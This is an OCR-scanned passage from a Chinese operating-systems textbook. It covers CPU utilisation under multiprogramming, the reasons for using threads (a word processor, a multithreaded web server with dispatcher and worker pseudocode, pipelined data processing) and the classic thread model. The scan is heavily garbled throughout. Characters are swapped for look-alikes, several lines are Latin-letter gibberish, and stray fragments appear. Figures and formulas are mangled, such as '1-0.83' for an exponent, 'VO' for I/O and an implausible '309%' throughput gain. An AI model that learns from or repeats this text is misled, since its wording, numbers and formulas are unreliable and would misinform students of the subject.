进程 ， 所 以 当 CPU 忙 时 ， 已 就 绪 的 进程 也 必须 等 等 CYPU。 因 而 ， 进 程 


不 是 独立 的 。 更 精确 的 模型 应 该 用 排队 论 构 造 ， 但 我 们 的 模型 ( 当 进 
程 就 绪 时 ， 给 进程 分 配 CPU， 否 则 让 CPU 空转 ) 仍然 是 有 效 的 ， 即 使 
图 2-6 的 真实 曲线 会 与 图 中 所 男 的 略 有 不 同 。 


虽然 图 2-6 的 模型 很 简单 ， 很 粗略 ， 它 依然 对 预测 CPU 的 性 能 很 有 
效 。 例 如 ， 假 设计 算 机 有 512MB 内 存 ， 操 作 系统 占用 128MB， 每 个 用 
户 程序 也 占用 128MB“。 这 些 内 存 空间 允许 3 个 用 户 程序 同时 驻 留 在 内 存 
中 。 者 80% 的 时 间 用 于 VO 等 每 ， 则 CPU 的 利用 率 (忽略 操作 系统 
销 ) 大 约 是 1-0.83 ， 即 大 约 49%。 在 增加 512MB 字 节 的 内 存 后 ， 可 从 3 
道 程 序 设计 提高 到 7 道 程序 设计 ， 因 而 CPU 利用 率 提高 到 79%。 换 言 
之 ， 第 二 个 512MB 内 存 提高 了 309% 的 吞 叶 量 。 


增加 第 三 个 512MB 内 存 只 能 将 CPU 利 用 率 从 79% 提 高 到 91%， 吞 叶 
量 的 提高 仅 为 12%。 通 过 这 一 模型 ， 计 算 机 用 户 可 以 确定 第 一 次 增加 内 
存 是 一 个 合算 的 投资 ,而 第 二 个 则 不 是 。 


2.2 线程 


在 传统 操作 系统 中 ， 每 个 进程 有 一 个 地 址 空间 和 一 个 控制 线程 。 
事实 上 ， 这 几乎 就 是 进程 的 定义 。 不 过 ， 经 常 存 在 在 同一 个 地 址 空间 
中 准 并 行 运行 多 个 控制 线程 的 情形 ， 这 些 线程 就 像 (差不多 ) 分 离 的 
进程 (共享 地 址 空间 除外 ) 。 在 下 面 各 节 中 ， 我 们 将 讨论 这 些 情形 及 
其 实现 。 


2.2.1 ”线程 的 使 用 


为 什么 人 们 需要 在 一 个 进程 中 再 有 一 类 进程 ? 有 者 干 理 由 说 明 产 
生 这 些 迷 你 进程 〈 称 为 线程 ) 的 必要 性 。 下 面 我 们 来 讨论 其 中 一 些 理 
由 。 人 们 需要 多 线程 的 主要 原因 是 ， 在 许多 应 用 中 同时 发 生 着 多 种 活 
动 。 其 中 某 些 活动 随 着 时 间 的 推移 会 被 阻塞 。 通 过 将 这 些 应 用 程序 分 
解 成 可 以 准 并 行 运行 的 多 个 顺序 线程 ， 程 序 设 计 模型 会 变 得 更 简单 。 


在 前 面 我 们 已 经 进行 了 有 关 讨 论 。 谁 确 地 说 ， 这 正 是 之 前 关于 进 
程 模型 的 讨论 。 有 了 这 样 的 抽象 ， 我 们 才 不 必 考 虑 中 断 、 定 时 秀和 上 
下 文 切换 ， 而 只 需 考 察 并 行进 程 。 类 似 地 ， 只 是 在 有 了 多 线程 概念 之 
后 ， 我 们 才 加 入 了 一 种 新 的 元 素 : 并 行 实体 共享 同一 个 地 址 空间 和 所 


有 可 用 数据 的 能 力 。 对 于 某 些 应 用 而 言 ， 这 种 能 力 是 必需 的 ， 而 这 正 
是 多 进程 模型 〈 它 们 具有 不 同 地 址 空间 ) 所 无 法 表达 的 。 


第 二 个 关于 需要 多 线程 的 理由 是 ， 由 于 线程 比 进程 更 轻 量 级 ， 所 
以 它们 比 进程 更 容易 CER) 创建 ， 也 更 容易 撤销 。 在 许多 系统 
中 ， 创 建 一 个 线程 较 创 建 一 个 进程 要 快 10~100 倍 。 在 有 大 量 线程 需要 
动态 和 快速 修改 时 ， 具 有 这 一 符 性 是 很 有 用 的 。 


需要 多 线程 的 第 三 个 原因 涉及 性 能 方面 的 讨论 。 阁 多 个 线程 都 是 
CPU 密集 型 的 ， 那 么 并 不 能 获得 性 能 上 的 增强 ， 但 是 如 有 果 人 存在 着 大 量 
的 计算 和 大 量 的 VO 人 处理 ， 拥 有 多 个 线程 允许 这 些 活动 彼此 重合 进行 ， 
从 而 会 加 快 应 用 程序 执行 的 速度 。 


最 后 ， 在 多 CPU 系 统 中 ， 多 线程 是 有 益 的 ， 在 这 样 的 系统 中 ， 真 
正 的 并 行 有 了 实现 的 可 能 。 我 们 会 在 第 8 章 讨论 这 个 主题 。 


通过 考察 一 些 典 型 例子 ， 我 们 束 可 以 更 请 区 地 看 出 多 线程 的 有 益 
之 处 。 作 为 第 一 个 例 和 于， 考虑 一 个 字 处 理 软件 。 字 处 理 软件 通常 按照 
出 现在 打印 页 上 的 格式 在 屏幕 上 精确 显示 文档 。 特 别 地 ， 所 有 的 行 分 
隅 符 和 页 分 陋 符 都 在 正确 的 最 终 位 置 上 上， 这样 在 需要 时 用 户 可 以 检查 
和 修改 文档 比如， 消除 孤 行 一 一 在 一 页 上 不 完整 的 顶部 行 和 确 部 
行 ， 因 为 这 些 行 不 其 美观 ) 。 


假设 用 户 正 在 写 一 本 书 。 从 作者 的 观点 来 看 ， 最 容易 的 方法 是 把 
整 本 书 作为 一 个 文件 ， 这 样 一 来 ， 查 询 内容 、 完 成 全 局 替换 等 都 非常 
容易 。 另 一 种 方法 是 ， 把 每 一 章 都 处 理 成 单独 一 个 文件 。 但 是 ， 在 把 
每 个 小 太 和 子 小 下 都 分 成 单个 的 文件 之 后 ， 知 必须 对 全 书 进行 全 局 的 
修改 时 ， 那 就 真是 脐 烦 了 ， 因 为 有 成 百 个 文件 必须 一 个 个 地 编辑 。 例 
如 ， 如 果 所 建议 的 某 个 标准 xxxx 正 好 在 书 付 印 之 前 被 批准 了 ， 于 是“ 标 
准 草案 xxxx” 一 类 的 字眼 束 必 须 改 为 “标准 xxxx”。 如 琳 整 本 书 古 一 个 文 
件 ， 那 么 只 要 一 个 命令 就 可 以 完成 全 部 的 蔡 换 处 理 。 相 反 ， 如 果 一 本 
书 分 成 了 300 个 文件 ， 那 么 就 必须 分 别 对 每 个 文件 进行 编辑 。 


现在 考虑 ， 如 采 有 一 个 用 户 突 然 在 一 个 有 800 页 的 文件 的 第 一 页 上 
删 控 了 一 个 语句 之 后 ， 会 发 生 什么 情形 。 在 检查 了 所 修改 的 页 面 并 确 
认 正 确 后 ， 这 个 用 户 现 在 打算 接着 在 第 600 页 上 进行 男 一 个 修改 ， 并 键 
入 一 条 命令 通知 字 处 理 软件 转 到 该 页 面 (可 能 要 查阅 只 在 那里 出 现 的 
一 个 短语 ) 。 于 是 字 人 处 理 软 件 被 强制 对 整个 书 的 前 600 页 重新 进行 格式 
处 理 ， 这 是 因为 在 排列 该 页 前 面 的 所 有 页 面 之 前 ， 字 处 理 软件 并 不 知 
道 第 600 页 的 第 一 行 应 该 在 哪里 。 而 在 第 600 页 的 页 面 可 以 真正 在 屏幕 
上 显示 出 来 之 前 ， 计 算 机 可 能 要 拖延 相当 一 段 时 间 ， 从 而 令 用 户 不 其 


y 
y 


= 
Ey o 
JON 


aH 


多 线程 在 这 里 可 以 发 挥 作用 。 假 设 字 处 理 软件 被 编写 成 舍 有 两 个 
线程 的 程序 。 一 个 线程 与 用 户 交 互 ， 而 男 一 个 在 后 台 重 新 进行 格式 处 


理 。 一 旦 在 第 1 页 中 的 语句 被 删除 掉 ， 区 互 线程 就 立即 通知 格式 化 线程 
对 整 本 书 重 新 进行 处 理 。 同 时 ， 交 互 线程 继续 监控 键盘 和 鼠标 ， 并 员 
应 诸如 滚动 第 1 页 之 类 的 简单 命令 ， 此 刻 ， 男 一 个 线程 正在 后 台 闫 狂 地 
运算 。 如 有 果 有 点 运气 的 话 ， 重 新 格式 化 会 在 用 户 请 求 查 看 第 600 页 之 前 
完成 ， 这 样 ， 第 600 页 页 面 就 立即 可 以 在 屏幕 上 显示 出 来 。 


如 采 我 们 已 经 做 到 了 这 一 步 ， 那 么 为 什么 不 再 进一步 增加 一 个 线 
程 呢 ? 许多 字 处 理 软件 都 有 每 隔 奉 干 分 钟 目 动 在 磁盘 上 保存 整个 文件 
的 特点 ， 用 于 避免 由 于 程序 崩 涡 、 系 统 崩 浇 或 电源 故障 而 造成 用 户 一 
整 天 的 工作 丢失 的 情况 。 第 三 个 线程 可 以 处 理 磁 盘 备份 ， 而 不 必 干 扰 
其 他 两 个 线程 。 拥 有 三 个 线程 的 情形 ， 如 图 2-7 所 示 。 


图 2-7 有 三 个 线程 的 字 处 理 软件 


URIET ee RE, ARATE METIS EY, ORB PERE AM Sn 
的 命令 就 会 被 忽略 ， 直 到 备份 工作 完成 为 止 。 用 户 当 然 会 认为 性 能 很 
差 。 另 一 个 方法 是 ， 为 了 获得 好 的 性 能 ， 可 以 让 键盘 和 鼠标 事件 中 断 
磁盘 备份 ， 但 这 样 却 引入 了 复杂 的 中 断 驱 动 程序 设计 模型 。 如 果 使 用 
三 个 线程 ， 程 序 设计 模型 就 很 简单 了 。 第 一 个 线程 只 是 和 用 户 交 互 ; 
第 二 个 线程 在 得 到 通知 时 进行 文档 的 重新 格式 化 ， 第 三 个 线程 周期 性 
地 将 RAM 中 的 内 容 写 到 磁盘 上 。 


很 显然 ， 在 这 里 用 三 个 不 同 的 进程 是 不 能 工作 的 ， 这 是 因为 三 个 
线程 都 需要 在 同一 个 文件 上 进行 操作 。 通 过 证 三 个 线程 代替 三 个 进 
程 ， 三 个 线程 共享 公共 内 存 ， 于 是 它们 都 可 以 访问 同一 个 正在 编辑 的 
人 


许多 其 他 的 交互 式 程序 中 也 存在 类 似 的 情形 。 例 如 ， 电 子 表格 是 
允许 用 户 维护 矩阵 的 一 种 程序 ， 和 矩阵 中 的 一 些 元 素 是 用 户 提 供 的 数 
据 ， 男 一 些 元 素 是 通过 所 输入 的 数据 运用 可 能 比较 复杂 的 公式 而 得 出 
的 计算 结 末 。 当 用 户 改变 一 个 元 系 时 ， 许 多 其 他 元 素 丈 必须 重 狐 计 
算 。 通 过 一 个 后 台 线 程 进行 重新 计算 的 方式 ， 交 互 式 线程 束 能 够 在 进 
行 计算 的 时 候 ， 让 用 户 从 事 更 多 的 工作 。 类 似 地 ， 第 三 个 线程 可 以 在 
化 一 上 进行 周期 性 的 备份 工作 。 


现在 考虑 男 一 个 多 线程 发 挥 作用 的 例子 :一 个 万 维 网 服务 絮 。 对 
页 面 的 请 求 发 给 服务 左 ， 而 所 请 求 的 页 面 发 回 给 客户 机 。 在 多 数 Web 站 


点 上 ， 某 些 页 面 较 其 他 页 面相 比 ， 有 更 多 的 访问 。 例 如 ， 对 Sony 主 页 
的 访问 吏 远 远 超过 对 深 藏 在 页 面 树 里 的 任何 特定 摄像 机 的 技术 说 明 书 
页 面 的 访问 。 利 用 这 一 事实 ，Web 服 务 器 可 以 把 获得 大 量 访问 的 页 面 集 
合 人 存在 内 存 中 ， 避 人 免 到 磁盘 去 调 入 这 些 页 面 ， 从 而 改善 性 能 。 这 样 
的 一 种 页 面 集合 称 为 高 速 缓存 (cache) ， 高 速 缓存 也 运用 在 其 他 许多 
场合 中 。 例 如 在 第 1 章 中 介绍 的 CPU 缓存 。 


一 种 组 织 Web 服 务 器 的 方式 如 图 2-8 所 示 。 在 这 里 ， 一 个 称 为 分 派 
程序 (dispatcher) 的 线程 从 网 络 中 读 入 工作 请 求 。 在 检查 请 求 之 后 ， 
分 派 线程 挑选 一 个 空转 的 ( 即 被 阻塞 的 ) 工作 线程 (worker thread) , 
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图 2-8 一 个 多 线程 的 web 服务 器 


在 工作 线程 被 唤醒 之 后 ， 它 检查 有 关 的 请 求 是 否 在 Web 页 面 高 速 组 
存 之 中 ， 这 个 高 速 缓存 是 所 有 线程 都 可 以 访问 的 。 如 果 没 有 ， 该 线程 
开始 一 个 从 磁 玛 调 入 页 面 的 read 操 作 ， 并 且 阻 塞 直到 该 磁盘 操作 完成 。 
当 上 述 线程 阻塞 在 磁盘 操作 上 时 ， 为 了 完成 更 多 的 工作 ， 分 扳 线 程 可 
能 挑选 男 一 个 线程 运行 ， 也 可 能 把 男 一 个 当前 整 绪 的 工作 线程 投入 运 


行 。 

这 种 模型 允许 把 服务 器 编写 为 顺序 线程 的 一 个 集合 。 在 分 派 线程 
的 程序 中 包含 一 个 无 限 循环 ， 该 循环 用 来 获得 工作 请 求 并 且 把 工作 请 
求 派 给 工作 线程 。 每 个 工作 线程 的 代码 包含 一 个 从 分 派 线程 接收 请 


求 ， 并 且 检 查 Web 高 速 缓存 中 是 否 存 在 所 需 页 面 的 无 限 循环 。 如 采 存 
在 ， 束 将 该 页 面授 回 给 客户 机 ， 接 着 该 工作 线程 阻塞 ， 等 竺 一 个 新 的 
请 求 。 如 条 没有 ， 工 作 线 程 想 从 磁 玛 调 入 该 页 面 ， 将 该 页 面 返回 给 客 
户 机 ， 然 后 该 工作 线程 阻塞 ， 等 待 一 个 新 的 请 求 。 


图 2-9 给 出 了 有 关 代 码 的 大 至 框架。 如同 本 书 的 其 他 部 分 一 样 ， 这 
里 假设 TRUE 为 常数 1。 另 外 ，buf 和 page 分 别 是 保存 工作 请 求 和 Web 页 
面 的 相应 结构 。 


while (TRUE) { 
get_next_request(&buf); 
handoff_work(&buf); 


while (TRUE) { 
wait_for_work(&buf) 
look_for_page_in_cache(&buf, &page); 


} if (page_not_in_cache(&page)) 
read_page_from_disk(&buf, &page); 


return_page(&page); 


a) b) 


图 2-9 ”对 应 图 2-8 的 代码 概要 a) 分 派 线 程 ，b) 工 作 线 程 


现在 考虑 在 没有 多 线程 的 情形 下 ， 如 何 编写 Web 服 务 丹 。 一 种 可 能 
的 方式 是， 使 其 像 一 个 线程 一 样 运行 。Web 服 务 闫 的 主 循环 获得 请 求 
仿 得 请 求 ， 并 且 在 取 下 一 个 请 求 之 前 完成 整个 工作 。 在 等 行 磁 盘 操 作 
时 ， 服 务 夯 束 空 转 ， 并 且 不 处 理 任何 到 来 的 其 他 请 求 。 如 果 该 Web 服 务 
亏 运 行 在 惟一 的 机 融 上 ， 通 第 情 形 都 是 这 样 ， 那 么 在 等 竺 磁盘 操作 时 
CPU 只 能 空转 。 结 采 导 致 每 秒 钟 只 有 很 少 的 请 求 被 处 理 。 可 见 线程 较 


好 地 改善 了 Web 服 务 器 的 性 能 ， 而 且 每 个 线程 是 按 通常 方式 顺序 编程 
的 。 


到 现在 为 止 ， 我 们 有 了 两 个 可 能 的 设计 ， 多 线程 Web 服 务 器 和 单线 
程 Web 服 务 上 器。 假设 没有 多 线程 可 用 ， 而 系统 设计 者 又 认 为 由 于 单线 程 
所 造成 的 性 能 降低 是 不 能 接受 的 ， 那 么 如 果 可 以 使 用 read 系 统 调 用 的 非 
阻塞 版 本 ， 还 存在 第 三 种 可 能 的 设计 。 在 请 求 到 来 时 ， 这 个 惟一 的 线 
程 对 请 求 进行 考察 。 如 有 果 该 请 求 能 够 在 高 速 缓存 中 得 到 满足 ， 那 么 一 
切 都 好 ， 如 条 不 能 ， 则 局 动 一 个 非 阻 蹇 的 磁 表 操 作 。 


服务 上 融 在 表格 中 记 杂 当前 请 求 的 状态 ， 然 后 去 处 理 下 一 个 事件 。 
下 一 个 事件 可 能 是 一 个 新 工作 的 请 求 ， 或 是 磁 副 对 先前 操作 的 回答 。 
如 朱 是 新 工作 的 请 求 ， 束 开始 该 工作 。 如 采 是 磁盘 的 回答 ， 束 从 表格 
中 取出 对 应 的 信息 ， 并 处 理 该 回答 。 对 于 非 阻 塞 磁盘 MO 而 言 ， 这 种 回 
答 多 数 会 以 信号 或 中 断 的 形式 出 现 。 


在 这 一 设计 中 ， 前 面 两 个 例子 中 的 “顺序 进程 ”模型 消失 了 。 每 次 
服务 器 从 为 某 个 请 求 工作 的 状态 切换 到 为 一 个 状态 时 ， 部 必须 显 式 地 
保存 或 重新 于 入 相应 的 计算 状态 。 事实 上 ， 我 们 以 一 种 困难 的 方式 模 
拟 了 线程 及 其 堆栈 。 这 里 ， 每 个 计算 都 有 一 个 被 保存 的 状态 ， 存 在 一 
个 会 发 生 且 使 得 相关 状态 发 生 改 变 的 事件 集合 ， 我 们 把 这 类 设计 称 为 
有 限 状态 机 (finite-state machine) 。 有 限 状 态 机 这 一 概念 广泛 地 应 用 
在 计算 机 科学 中 。 


现在 很 清楚 多 线程 必须 提供 的 是 什么 了 。 多 线程 使 得 顺序 进程 的 
思想 得 以 保留 下 来 ， 这 种 顺序 进程 阻塞 了 系统 调用 (如 磁盘 WO) ， 但 
征 仍 旧 实 现 了 并 行 性 。 对 系统 调用 进行 阻塞 使 程序 设计 变 的 较为 简 
单 ， 而 且 并 行 性 改善 了 性 能 。 单 线程 服务 郁 虽 然 你 留 了 阻塞 系统 调用 
的 简易 性 ， 但 是 却 放弃 了 人 性能。 第 三 种 处 理 方 法 运用 了 非 阻塞 调用 和 
中 断 ， 通 过 并 行 性 实现 了 高 性 能 ， 但 是 给 编程 增加 了 困难 。 在 图 2-10 中 
给 出 了 上 述 和 模式 的 总 结 。 


特性 | 
并 行 性 、 阻 塞 系 统 调用 
无 并 行 性 、 阻 塞 系统 调用 
并 行 性 、 非 阻塞 系统 调用 、 中 断 | 


模型 
多 厂 程 
单线 程 进程 
有 限 状态 机 


图 2-10 构造 服务 器 的 三 种 方法 


有 关 多 线程 作用 的 第 三 个 例子 是 那些 必须 处 理 极 大 量 数据 的 应 
用 。 通 利 的 处 理 方式 是 ， 读 进 一 块 数据 ， 对 其 处 理 ， 然 后 再 写 出 数 
据 。 这 里 的 问题 症 ， 如 果 只 能 使 用 阻塞 系统 调用 ， 那 么 在 数据 进入 和 
数据 输出 时 ， 会 阻塞 进程 。 在 有 大 量 计算 需要 处 理 的 时 候 ， 让 CPU 空 
转 显 然 是 浪费 ， 应 该 尽 可 能 避免 。 


多 线程 提供 了 一 种 解决 方案 ， 有 关 的 进程 可 以 用 一 个 输入 线程 、 
一 个 处 理 线程 和 一 个 输出 线程 构造 。 输 入 线程 把 数据 谈 入 到 输入 缓冲 
区 中 ;处 理 线程 从 输入 缓冲 区 中 取出 数据 ， 处 理 数据 ， 并 把 结 琳 放 到 


输出 缓冲 区 中 ; HH RET IK ee Ss BE Eo TEAR LEAT 
式 ， 输 入 、 处 理 和 输出 可 以 全 部 同时 进行 。 当 然 ， 这 种 模型 只 有 当 系 
统 调用 只 阻塞 调用 线程 而 不 是 阻 堵 整个 进程 时 ， 才 能 正 闻 工作 。 


2.2.2 ”经 典 的 线程 模型 


既然 我 们 已 经 明日 为 什么 线程 会 有 用 以 及 如 何 使 用 它们 ， 不 如 让 
我 们 用 更 近 一 步 的 眼光 来 审查 一 下 上 面 的 想法 。 进 程 模型 基于 两 种 独 
立 的 概念 ， 资 源 分 组 处 理 与 执行 。 有 了 时， 将 这 两 种 概念 分 开会 更 有 
益 ， 这 也 引入 了 “线程 "这 一 概念 。 我 们 将 先 来 看 经 典 的 线程 模型 ， 之 
后 我 们 会 来 全 完 “ 便 糊 进程 与 线程 分 界线 "的 Linux 线 程 模型 。 


理解 进程 的 一 个 角度 是 ， 用 某 种 方法 把 相关 的 资源 集中 在 一 起 。 
进程 有 存放 程序 正文 和 数据 以 及 其 他 资源 的 地 址 空间 。 这 些 资源 中 包 
括 打开 的 文件 、 子 进程 、 即 将 发 生 的 报警 、 信 和 号 处 理 程序 、 账 号 信息 
等 。 把 它们 都 放 到 进程 中 可 以 更 容易 管理 。 


另 一 个 概念 是 ， 进 程 拥有 一 个 执行 的 线程 ， 通 常 简 写 为 线程 
(thread) 。 在 线程 中 有 一 个 程序 计数 器 ， 用 来 记录 接着 要 执行 哪 一 条 
指令 。 线 程 拥 有 寄存 邵 ， 用 来 保存 线程 当前 的 工作 变量 。 线 程 还 拥有 
一 个 堆栈 ， 用 来 记录 执行 历史 ， 其 中 每 一 帧 保存 了 一 个 已 调用 的 但 是 
还 没有 从 中 返回 的 过 程 。 尽 管线 程 必须 在 某 个 进程 中 执行 ， 但 是 线程 
和 它 的 进程 是 不 同 的 概念 ， 并 且 可 以 分 别处 理 。 进 程 用 于 把 资源 集中 
到 一 起 ， 而 线程 则 是 在 CPU 上 被 调度 执行 的 实体 。 


线程 给 进程 模型 增加 了 一 项 内 容 ， 即 在 同一 个 进程 环境 中 ， 人 允许 
彼此 之 间 有 较 大 独立 性 的 多 个 线程 执行 。 在 同一 个 进程 中 并 行 运行 多 
个 线程 ， 古 对 在 同一 台 计 算 机 上 并 行 运行 多 个 进程 的 模拟 。 在 前 一 种 
情形 下 ， 多 个 线程 共享 同一 个 地 址 空间 和 其 他 资源 。 而 在 后 一 种 情形 
中 ， 多 个 进程 共享 物理 内 存 、 磁 副 、 打 印 机 和 其 他 资源 。 由 于 线程 具 
有 进程 的 某 些 性 质 ， 所 以 有 时 被 称 为 轻 量 级 进程 (lightweight 
process) 。 多 线程 这 个 术语 ， 也 用 来 描述 在 同一 个 进程 中 允许 多 个 线 
程 的 情形 。 正 如 我 们 在 第 1 章 中 看 到 的 ， 一 些 CPU 已 经 有 直接 硬件 文 持 
多 线程 ， 并 允许 线程 切换 在 纳 秒 级 完成 。 


在 图 2-11a 中 ， 可 以 看 到 三 个 传统 的 进程 。 每 个 进程 有 目 己 的 地 址 
空间 和 单个 控制 线程 。 相 反 ， 在 图 2-11b 中 ， 可 以 看 到 一 个 进程 带 有 三 
个 控制 线程 。 尽 管 在 两 种 情形 中 都 有 三 个 线程 ， 但 是 在 图 2-11a 中 ， 每 
一 个 线程 都 在 不 同 的 地 址 空间 中 运行 ， 而 在 图 2-11b 中 ， 这 三 个 线程 全 
部 在 相同 的 地 址 空间 中 运行 。 


进程 ] 进程 2 进程 3 进程 
用 户 空间 


内 核 空间 d 


Al 2-11 a) 三 个 进程 ， 每 个 进程 有 一 个 线程 ，b) 一 个 进程 市 三 个 线程 


当 多 线程 进程 在 单 CPU 系 统 中 运行 时 ， 线 程 轮流 运行 。 在 图 2-1 
中 ， 我 们 已 经 看 到 了 进程 的 多 道 程序 设计 是 如 何 工作 的 。 通 过 在 多 个 
进程 之 间 来 回 切换 ， 系 统制 造 了 不 同 的 顺序 进程 并 行 运行 的 假象 。 多 
线程 的 工作 方式 也 是 类 似 的 。CPU 在 线程 之 间 的 快速 切换 ， 制 造 了 线 
程 并 行 运行 的 假象 ， 好 似 它们 在 一 个 比 实际 CPU 慢 一 些 的 CPU 上 同时 
运行 。 在 一 个 有 三 个 计算 密集 型 线程 的 进程 中 ， 线 程 以 并 行 方式 运 
行 ， 每 个 线程 在 一 个 CPU 上 得 到 了 真实 CPU 速度 的 三 分 之 一 。 


进程 中 的 不 同 线程 不 像 不 同 进程 之 间 那 样 存在 很 大 的 独立 性 。 所 
有 的 线程 都 有 完全 一 样 的 地 址 空间 ， 这 意味 着 它们 也 共享 同样 的 全 局 
变量 。 由 于 各 个 线程 都 可 以 访问 进程 地 址 空间 中 的 每 一 个 内 存 地 址 ， 
所 以 一 个 线程 可 以 读 、 写 或 甚至 清除 男 一 个 线程 的 堆栈 。 线 程 之 间 是 
没有 保护 的 ， 原 因 是 1) 不 可 能 ，2) 也 没有 必要 。 这 与 不 同 进程 是 有 
差别 的 。 不 同 的 进程 会 来 自 不 同 的 用 户 ， 它 们 彼此 之 间 可 能 有 敌意 ， 
一 个 进程 总 是 由 某 个 用 户 所 拥有 ， 该 用 户 创建 多 个 线程 应 该 是 为 了 它 
们 之 间 的 合作 而 不 是 彼此 间 和 争斗 。 除 了 共享 地 址 空间 之 外 ， 所 有 线程 
还 共享 同一 个 打开 文件 集 、 子 进程 、 报 警 以 及 相关 信号 等 ， 如 图 2-12 所 
示 。 这 样 ， 对 于 三 个 没有 关系 的 线程 而 言 ， 应 该 使 用 图 2-11a 的 结构 ， 
而 在 三 个 线程 实际 完成 同一 个 作业 ， 并 彼此 积极 密切 合作 的 情形 中 ， 
图 2-11b 则 比较 合适 。 


每 个 进程 中 的 内 容 每 个 线程 中 的 内 容 


地 址 空间 程序 计数 器 
全 局 变量 寄存 器 
打开 文件 堆栈 

于 进程 状态 


即将 发 生 的 报警 
信号 与 信号 处 理 程序 
账户 信息 


图 2-12 第 一 列 给 出 了 在 一 个 进程 中 所 有 线程 共享 的 内 容 ， 第 二 列 给 
出 了 每 个 线程 目 己 的 内 容 


图 2-12 中 ， 第 一 列表 项 是 进程 的 属性 ， 而 不 是 线程 的 属性 。 例 如 ， 
如 果 一 个 线程 打开 了 一 个 文件 ， 该 文件 对 该 进程 中 的 其 他 线程 都 可 
见 ， 这 些 线程 可 以 对 该 文件 进行 读 写 。 由 于 资源 管理 的 捍 位 古 进 程 而 
非 线程 ， 所 以 这 种 情形 是 合理 的 。 如 采 每 个 线程 有 其 目 己 的 地 址 衬 
间 、 打 开 文 件 、 即 将 发 生 的 报警 等 ， 那 么 它们 束 应 该 古 不 同 的 进程 
了 。 线程 概念 试图 实现 的 是 ， 共 享 一 组 资源 的 多 个 线程 的 执行 能 
以 便 这 些 线程 可 以 为 完成 菏 一 任务 而 共同 工作 。 


和 传统 进程 一 样 〈 即 只 有 一 个 线程 的 进程 ) ， 线 程 可 以 处 于 若干 
种 状态 的 任何 一 个 : 运行 、 阻 塞 、 丈 绪 或 终止 。 正 在 运行 的 线程 拥有 
CPU 并 且 是 活跃 的 。 被 阻塞 的 线程 正在 等 待 某 个 释放 它 的 事件 。 例 
如 ， 当 一 个 线程 执行 从 键盘 读 入 数据 的 系统 调用 时 ， 该 线程 就 被 阻塞 
直到 键入 了 输入 为 止 。 线 程 可 以 被 阻塞， 以 便 等 待 某 个 外 部 事件 的 发 
生 或 者 等 待 其 他 线程 来 释放 它 。 就 绪 线 程 可 被 调度 运行 ， 并 且 只 要 轮 


到 它 就 很 快 可 以 运行 。 线 程 状态 之 间 的 转换 和 进程 状态 之 间 的 转换 是 
一 样 的 ， 如 图 2-2 所 示 。 


认识 到 每 个 线程 有 其 自己 的 堆栈 很 重要 ， 如 图 2-13 所 示 。 每 个 线程 
的 堆栈 有 一 帧 ， 供 各 个 被 调用 但 是 还 没有 从 中 返回 的 过 程 使 用 。 在 该 
帧 中 存放 了 相应 过 程 的 局 部 变量 以 及 过 程 调用 完成 之 后 使 用 的 返回 地 
址 。 例 如 ， 如 果 过 程 X 调 用 过 程 Y， 而 Y 又 调用 Z， 那 么 当 Z 执 行 时 ， 供 
X、Y 和 Zz 使 用 的 帧 会 全 部 存在 堆栈 中 。 通 常 每 个 线程 会 调用 不 同 的 过 
程 ， 从 而 有 一 个 各 自 不 同 的 执行 历史 。 这 就 是 为 什么 每 个 线程 需要 有 
自己 的 堆栈 的 原因 。 


线程 2 


进程 


线程 ] 
的 堆栈 
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图 2-13 每 个 线程 有 其 自己 的 堆栈 


在 多 线程 的 情况 下 ， 进 程 通常 会 从 当前 的 单个 线程 开始 。 这 个 线 
程 有 能 力 通过 调用 一 个 库 函 数 (如 thread_create) 创建 新 的 线程 。 
thread_create 的 参数 专门 指定 了 新 线程 要 运行 的 过 程 名 。 这 里 ， 没 有 必 
要 对 新 线程 的 地 址 空间 加 以 规定 ， 因 为 新 线程 会 自动 在 创建 线程 的 地 
址 空间 中 运行 。 有 时， 线程 是 有 层次 的 ， 它 们 具有 一 种 父子 关系 ， 但 
征 ， 通 闻 不 存在 这 样 一 种 天 系 ， 所 有 的 线程 都 是 平等 的 。 不 论 有 无 层 
次 关系 ， 创 建 线程 通常 都 返回 一 个 线程 标识 符 ， 该 标识 符 融 是 新 线程 
MAF? 


当 一 个 线程 完成 工作 后 ， 可 以 通过 调用 一 个 库 过 程 (如 
thread_exit) 退出 。 该 线程 接着 消失 ， 不 再 可 调度 。 在 某 些 线程 系统 
中 ， 通 过 调用 一 个 过 程 ， 例 如 thread_join， 一 个 线程 可 以 等 待 一 个 ( 特 
E) 线程 退出 。 这 个 过 程 阻塞 调 用 线程 直到 那个 (特定 ) 线程 退出 。 
在 这 种 情况 下 ， 线 程 的 创建 和 终止 非常 类 似 于 进程 的 创建 和 终止 ， 并 
且 也 有 着 同样 的 选项 。 


男 一 个 常见 的 线程 调用 是 thread_yield， 它 允许 线程 自动 放弃 CPU 
从 而 让 另 一 个 线程 运行 。 这 样 一 个 调用 是 很 重要 的 ， 因 为 不 同 于 进 
Be, (线程 库 ) 无 法 利用 时 钟 中 断 强制 线程 让 出 CPU“。 所 以 设法 使 线 
程 行为 “高尚 "起 来 ， 并 且 随 着 时 间 的 推移 目 动 交 出 CPU， 以 便 让 其 他 线 
程 有 机 会 运行 ， 殊 变 得 非常 重要 。 有 的 调用 允许 菏 个 线程 等 竺 为 一 个 


线程 完成 某 些 任务 ， 或 等 待 一 个 线程 宣称 它 已 经 完成 了 有 关 的 工作 
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某 种 程度 的 复杂 性 。 考 虑 一 下 UNIX 中 的 fork 系 统 调 用 。 如 果 父 进程 有 
多 个 线程 ， 那 么 它 的 子 进程 也 应 该 拥有 这 些 线程 吗 ? 如 宁 不 是 ， 则 该 
子 进 程 可 能 会 工作 不 正常 ， 因 为 在 该 子 进 程 中 的 线程 都 是 绝对 必要 
Hy) ° 
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在 read 系 统 调用 〈 比 如 键盘 ) 上 被 阻塞 了 会 发 生 什 么 情况 ? 是 两 个 线程 
CBA ETE et LE (一 个 属于 父 进 程 ， 另 一 个 属于 子 进程 》 吗 ? 在 键入 
一 行 输入 之 后 ， 这 两 个 线程 都 得 到 该 输入 的 副本 吗 ? 还 是 仅 有 父 进程 
得 到 该 输入 的 副本 ? 或 是 仅 有 子 进程 得 到 ? 类 似 的 问题 在 进行 网 络 连 
接 时 也 会 出 现 。 


男 一 类 问题 和 线程 共享 许多 数据 结构 的 事实 有 关 。 如 果 一 个 线程 
天 财 了 茶 个 文件 ， 而 男 一 个 线程 还 在 该 文件 上 进行 读 操 作 时 会 怎样 ? 
假设 有 一 个 线程 注意 到 几乎 没有 内 存 了 ， 并 开始 分 配 更 多 的 内 存 。 在 
